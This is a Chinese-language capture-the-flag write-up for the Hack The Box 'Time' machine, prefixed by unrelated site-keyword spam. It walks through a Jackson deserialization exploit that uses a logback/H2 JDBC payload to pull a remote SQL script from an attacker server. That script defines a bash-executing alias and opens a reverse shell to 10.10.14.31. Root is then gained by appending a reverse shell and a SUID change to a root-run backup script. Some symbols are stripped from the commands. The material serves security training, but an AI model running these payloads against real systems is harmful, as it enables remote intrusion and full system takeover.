花都网站建设信科网络,中企动力z云邮箱,天津网站建站,企业内部网站模板下载HTB-Time 信息收集80端口 立足pericles - root 信息收集 80端口 有两个功能#xff0c;一个是美化JSON数据。 一个是验证JSON#xff0c;并且输入{“abc”:“abc”}之类的会出现报错。 Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonPa… HTB-Time 信息收集80端口 立足pericles - root 信息收集 80端口 有两个功能一个是美化JSON数据。 一个是验证JSON并且输入{“abc”:“abc”}之类的会出现报错。 Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unexpected character (‘’’ (code 39)): expected a valid value (number, String, array, object, ‘true’, ‘false’ or ‘null’) 根据报错可知是java jackson的报错。有关java jackson的漏洞非常多。其中有一篇文章提到几个负载。
[ch.qos.logback.core.db.DriverManagerConnectionSource, {url:jdbc:h2:tcp://10.10.14.31:4443/~test}]立足
新建一个文件名为inject1.sql。
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {String[] command {bash, -c, cmd};java.util.Scanner s new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter(\\A);return s.hasNext() ? s.next() : ; }
$$;
CALL SHELLEXEC(bash -i /dev/tcp/10.10.14.31/443 01)python开启http.server。然后在验证功能下输入
[ch.qos.logback.core.db.DriverManagerConnectionSource, {url:jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT3;INITRUNSCRIPT FROM http://10.10.14.31:8000/inject1.sql}]pericles - root
pspy64可以看到有一个timer_backup.sh没几秒种就会运行一次。 内容如下
#!/bin/bash
zip -r website.bak.zip /var/www/html mv website.bak.zip /root/backup.zip以及/usr/bin/systemctl restart web_backup.service。 查找web_backup.service并查看内容
find / -name web_backup.service -type f 2/dev/null
/etc/systemd/system/web_backup.servicepericlestime:/tmp$ cat /etc/systemd/system/web_backup.service
[Unit]
DescriptionCreates backups of the website[Service]
ExecStart/bin/bash /usr/bin/timer_backup.sh因为隔几秒种会重启web_backup.serviceweb_backup.service服务又会运行/usr/bin/timer_backup.sh。
还有一个/bin/sh -c /usr/bin/systemctl restart timer_backup.timer不过我暂时不需要留在这备用。 我们能写入timer_backup.sh但是时间任务并没执行我写入的内容可能还有时间任务先对timer_backup.sh进行重置再运行。顺序是某个东西启动web_backup.serviceweb_backup.service启动timer_backup.sh。但是我没找到那个东西是什么。所以我决定再尝试对timer_backup.sh追加写入试试。向末尾添加cp /bin/bash /tmp/bash;chmod us /tmp/bash后等待片刻后仍无任何成功迹象。写入reshell到/usr/bin/timer_backup.sh里能成功。 echo -e \nbash -i /dev/tcp/10.10.14.31/4443 01 /usr/bin/timer_backup.sh但是几秒钟后就没了。 可以用echo “chmod us /bin/bash” 修改/bin/bash但为什么不能复制过来后再修改呢。 我不知道。
